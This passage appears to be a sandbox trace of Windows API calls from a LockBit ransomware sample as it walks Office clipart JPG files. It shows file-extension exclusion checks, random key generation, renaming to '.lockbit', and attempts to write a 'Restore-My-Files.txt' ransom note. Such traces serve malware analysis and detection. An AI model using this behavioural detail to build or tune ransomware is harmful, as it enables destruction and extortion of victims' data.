lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.394] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.394] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.394] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.394] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.394] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.395] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.395] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.396] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382930.JPG") returned 1 [0159.396] lstrcmpiW (lpString1="ntldr", lpString2="J0382930.JPG") returned 1 [0159.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382930.JPG") returned 1 [0159.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382930.JPG") returned -1 [0159.396] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382930.JPG") returned -1 [0159.396] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382930.JPG") returned 1 [0159.396] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382930.JPG") returned -1 [0159.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG") returned=".JPG" [0159.396] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.396] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.397] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.397] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.398] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.398] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.398] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.398] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG.lockbit") returned 72 [0159.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382930.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.399] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.399] malloc (_Size=0x40068) returned 0x3d70450 [0159.399] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=112698) returned 1 [0159.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.400] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.406] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.406] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.408] free (_Block=0x1fa2ed8) [0159.408] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.408] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.408] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1df43, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382931.JPG", cAlternateFileName="")) returned 1 [0159.408] lstrcmpiW (lpString1=".", lpString2="J0382931.JPG") returned -1 [0159.408] lstrcmpiW (lpString1="..", lpString2="J0382931.JPG") returned -1 [0159.408] PathFindExtensionW (pszPath="J0382931.JPG") returned=".JPG" [0159.408] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.408] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.408] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.408] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.408] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.408] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.408] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.408] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.408] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.409] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.409] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.410] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.410] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382931.JPG") returned 1 [0159.410] lstrcmpiW (lpString1="ntldr", lpString2="J0382931.JPG") returned 1 [0159.410] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382931.JPG") returned 1 [0159.410] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382931.JPG") returned -1 [0159.410] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382931.JPG") returned -1 [0159.410] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382931.JPG") returned 1 [0159.411] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382931.JPG") returned -1 [0159.411] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.411] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG") returned=".JPG" [0159.411] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.411] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.411] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.411] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.411] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.411] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.411] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.412] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.412] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG.lockbit") returned 72 [0159.412] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382931.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0159.413] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.413] malloc (_Size=0x40068) returned 0x3ef0008 [0159.413] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=122691) returned 1 [0159.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0159.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0159.415] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0159.421] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.421] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.421] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.423] free (_Block=0x1fa2ed8) [0159.423] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.423] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.423] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x184d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382938.JPG", cAlternateFileName="")) returned 1 [0159.423] lstrcmpiW (lpString1=".", lpString2="J0382938.JPG") returned -1 [0159.423] lstrcmpiW (lpString1="..", lpString2="J0382938.JPG") returned -1 [0159.423] PathFindExtensionW (pszPath="J0382938.JPG") returned=".JPG" [0159.423] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.423] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.423] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.423] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.423] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.423] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.424] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.424] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382938.JPG") returned 1 [0159.425] lstrcmpiW (lpString1="ntldr", lpString2="J0382938.JPG") returned 1 [0159.425] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382938.JPG") returned 1 [0159.425] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382938.JPG") returned -1 [0159.425] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382938.JPG") returned -1 [0159.425] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382938.JPG") returned 1 [0159.425] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382938.JPG") returned -1 [0159.425] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.425] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG") returned=".JPG" [0159.425] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.425] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.425] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.426] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.426] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.426] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.426] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.426] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.426] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG.lockbit") returned 72 